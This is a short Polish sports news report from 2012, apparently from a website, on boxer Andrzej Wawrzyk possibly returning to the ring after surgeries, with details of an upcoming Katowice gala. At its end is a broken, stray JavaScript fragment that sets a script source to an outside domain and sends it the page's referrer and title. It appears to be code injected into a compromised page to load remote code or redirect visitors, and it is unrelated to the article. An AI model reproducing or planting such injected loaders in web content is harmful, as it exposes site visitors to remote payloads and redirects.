Andrzej Wawrzyk szykuje się do powrotu na ring

15.11.2012 / Andrzej Wawrzyk / Boks

Być może 8 grudnia na gali „Wojak Boxing Night” w Katowicach swoją pierwszą walkę po półrocznej przerwie stoczy Andrzej Wawrzyk z Trec Team (26-0, 13 KO). Notowany w czołówce światowych rankingów wagi ciężkiej krakowianin po raz ostatni boksował w czerwcu, pokonując na punkty doświadczonego Denisa Bachtowa. Później Wawrzyk musiał poddać się operacjom kontuzjowanej nogi i barku.

– Mam za sobą dwa zabiegi, dużo rehabilitacji. Teraz wróciłem już na salę, ćwiczę – opowiada niezwyciężony jako zawodowiec bokser KnockOut Promotions i Trec Team. – Jest mowa o tym, że mogę zaboskować 8 grudnia w „Spodku”, ale wciąż chodzę na rehabilitację.

– Boję się odnowienia kontuzji, dlatego po konsultacji podejmiemy z trenerem ostateczną decyzję co do mojego występu, bo może lepiej będzie do końca doleczyć wszystko, spokojnie ćwicząc na sali i wrócić na ring dopiero w przyszłym roku – dodaje Andrzej Wawrzyk.

Głównymi wydarzeniami grudniowej gali „Wojak Boxing Night” będą pojedynki Pawła Kołodzieja z Trec Team (30-0, 17 KO) z Garrettem Wilsonem (13-5-1, 7 KO) o pierwszą pozycję w rankingu IBF wagi junior ciężkiej oraz Damiana Jonaka z Trec Team (34-0-1, 21 KO) z mistrzem Unii Europejskiej kategorii junior średniej Jacksonem Osei Bonsu (43-5-1, 29 KO).

Źródło: ringpolska.pl, dostęp: 15.11.2012

 

 

 }s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';